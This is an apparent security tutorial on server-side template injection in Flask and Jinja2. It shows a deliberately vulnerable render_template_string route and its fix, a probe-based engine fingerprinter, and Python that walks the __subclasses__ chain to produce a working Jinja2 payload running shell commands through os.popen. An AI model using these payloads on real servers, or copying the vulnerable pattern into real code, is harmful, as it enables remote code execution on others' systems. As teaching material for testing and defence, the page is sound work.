Template Injection ✖️

SSTI (Server-Side Template Injection) occurs when an attacker can use the native syntax of a template engine to inject a payload into a template that the server then renders, so the payload is evaluated server-side, usually with the privileges of the web application.

Many frameworks use a template engine, and each has its own syntax. This guide helps identify which engine a target is using and how to exploit it.

Methodology from PayloadsAllTheThings

Flask

Flask is a Python web framework built on the Werkzeug WSGI toolkit and the Jinja2 template engine. SSTI in Flask typically arises when user input is concatenated into the template source handed to `render_template_string` (or written into a template file) instead of being passed to the template as a context variable.

SSTI syntax
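As an added example (not code from the original page or from Flask), the block below shows the pattern that produces SSTI in Flask next to the fixed version, and a small fingerprinting helper that applies the PayloadsAllTheThings probe tree (`{{7*7}}`, `{{7*'7'}}`, `${7*7}`, `<%= 7*7 %>`). The Flask routes assume Flask is installed and exist only to show the pattern; the probe responses are constructed, not captured from a real target.

```python
"""Jinja2/Flask SSTI: the vulnerable pattern, the fix, and engine fingerprinting."""
# Added example, not code from the original page or from Flask itself.
# Expected probe outputs follow the PayloadsAllTheThings detection tree;
# every response below is constructed, not captured from a real target.
from typing import Callable, Dict, List


def make_app():
    """Minimal Flask app with one vulnerable and one safe route (assumes Flask)."""
    from flask import Flask, render_template_string, request  # deferred: only needed to serve

    app = Flask(__name__)

    @app.route("/vuln")
    def vuln():
        name = request.args.get("name", "")
        # BUG: user input becomes part of the template SOURCE, so
        # ?name={{7*7}} renders "Hello 49": template syntax is evaluated.
        return render_template_string("Hello " + name)

    @app.route("/safe")
    def safe():
        name = request.args.get("name", "")
        # FIX: the template is a constant; input is passed as context data,
        # so {{7*7}} is rendered literally (and HTML-escaped).
        return render_template_string("Hello {{ name }}", name=name)

    return app


# probe -> engine -> the string that engine renders the probe to
PROBES: Dict[str, Dict[str, str]] = {
    "{{7*7}}": {"jinja2": "49", "twig": "49"},
    "{{7*'7'}}": {"jinja2": "7777777", "twig": "49"},  # Python repeats the str, PHP coerces it
    "${7*7}": {"mako": "49", "freemarker": "49"},
    "<%= 7*7 %>": {"erb": "49"},
}


def identify_engine(observed: Dict[str, str]) -> List[str]:
    """Return the engines consistent with every observed probe/response pair.

    An engine survives only if each probe it is expected to evaluate came back
    evaluated, and at least one probe was actually evaluated (otherwise the
    input is merely reflected and there is no injection at all).
    """
    engines = {e for table in PROBES.values() for e in table}
    consistent: List[str] = []
    for engine in sorted(engines):
        evaluated = 0
        for probe, body in observed.items():
            expected = PROBES.get(probe, {}).get(engine)
            if expected is None:
                continue  # engine does not use this syntax; reflection is expected
            if expected not in body:
                break  # engine would have evaluated it but the output is missing
            evaluated += 1
        else:
            if evaluated:
                consistent.append(engine)
    return consistent


def probe_target(send: Callable[[str], str]) -> List[str]:
    """Send every probe through `send` (one HTTP request each in real use)."""
    return identify_engine({p: send(p) for p in PROBES})


def fake_jinja2_target(payload: str) -> str:
    """Constructed stand-in for /vuln above: answers like Jinja2 for the probes."""
    answers = {"{{7*7}}": "49", "{{7*'7'}}": "7777777"}
    return "Hello " + answers.get(payload, payload)  # unknown syntax is reflected as-is


if __name__ == "__main__":
    print(probe_target(fake_jinja2_target))  # ['jinja2']
```

Against a real target, replace `fake_jinja2_target` with a function that sends the payload in the injected parameter and returns the response body. The `{{7*'7'}}` probe is what separates Jinja2 from Twig: both render `{{7*7}}` as `49`, but Python repeats the string to `7777777` while PHP coerces `'7'` to a number.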

RCE (Remote Code Execution)
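The classic Jinja2 RCE payloads, whether the generic `{{ ''.__class__.__mro__[1].__subclasses__()[N].__init__.__globals__ ... }}` chain or the Flask-specific `{{ config.__class__.__init__.__globals__['os'] }}`, all do the same thing: climb from a harmless object to `object`, enumerate every class loaded in the process, and borrow the globals of one written in Python to reach `os`. The block below is an added example, not code from the page, that walks that chain in plain Python so it runs without Jinja2 or Flask installed; the class index it reports is specific to the process it runs in, which is the caveat that matters most when reusing published payloads.

```python
"""Why the classic Jinja2 RCE payloads work, traced outside the template."""
# Added example, not code from the original page. It follows the same
# attribute chain a payload such as
#   {{ ''.__class__.__mro__[1].__subclasses__()[N].__init__.__globals__ }}
# walks inside the engine, in plain Python, so it runs without Jinja2 or
# Flask. The index N found below is whatever THIS interpreter happens to
# have loaded, which is exactly why copy-pasted indices break between targets.
import os
from typing import Optional, Tuple


def find_gadget() -> Optional[Tuple[int, str, dict]]:
    """Locate the first loaded class whose __init__ is Python code.

    ''.__class__            -> str
    .__mro__[1]             -> object (root of every class)
    .__subclasses__()       -> every direct subclass of object in the interpreter
    .__init__.__globals__   -> that class's module globals (only Python-level
                               functions have __globals__; C slots do not)
    Returns (index, class name, globals dict) or None.
    """
    for idx, cls in enumerate("".__class__.__mro__[1].__subclasses__()):
        try:
            glob = getattr(cls.__init__, "__globals__", None)
        except Exception:  # a few exotic classes refuse attribute access
            continue
        if isinstance(glob, dict):
            return idx, cls.__name__, glob
    return None


def os_via_gadget():
    """Reach the os module the way a payload does, never writing `import os`.

    Every Python function's globals carry __builtins__, and __import__ lives
    there, so this works even when no loaded class has `os` in its globals.
    """
    found = find_gadget()
    if found is None:
        return None
    _, _, glob = found
    if getattr(glob.get("os"), "__name__", None) == "os":
        return glob["os"]                # the shortcut many published payloads rely on
    builtins = glob.get("__builtins__")  # a dict in imported modules, a module in __main__
    if builtins is None:
        return None
    importer = builtins["__import__"] if isinstance(builtins, dict) else builtins.__import__
    return importer("os")


def gadget_reaches_real_os() -> bool:
    """True when the object reached by pure traversal is the real os module."""
    return os_via_gadget() is os


def jinja2_payload(command: str) -> str:
    """Build the template payload equivalent to os_via_gadget() for THIS process."""
    found = find_gadget()
    if found is None:
        raise RuntimeError("no Python-level __init__ among loaded classes")
    idx, _, _ = found
    # Jinja2 resolves x['k'] as item OR attribute access, so the subscript
    # works whether __builtins__ is a dict or a module on the target.
    return (
        "{{ ''.__class__.__mro__[1].__subclasses__()[%d]"
        ".__init__.__globals__['__builtins__']['__import__']('os')"
        ".popen(%r).read() }}" % (idx, command)
    )


if __name__ == "__main__":
    idx, name, _ = find_gadget()
    print("gadget: index %d is %s" % (idx, name))
    print("reached real os:", gadget_reaches_real_os())
    print(jinja2_payload("id"))
```

Because the order of `__subclasses__()` depends on what the target imported and in which order, a payload copied with a fixed index frequently points at the wrong class; a `{% for %}` loop over the list that matches on `__name__` is more portable than an index. On the defensive side, `jinja2.sandbox.SandboxedEnvironment` refuses attributes that start with an underscore, which cuts this chain at `__class__`, but the real fix is never to build the template source from user input.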

To bypass filters and other restrictions on these payloads, see the following resources:

References
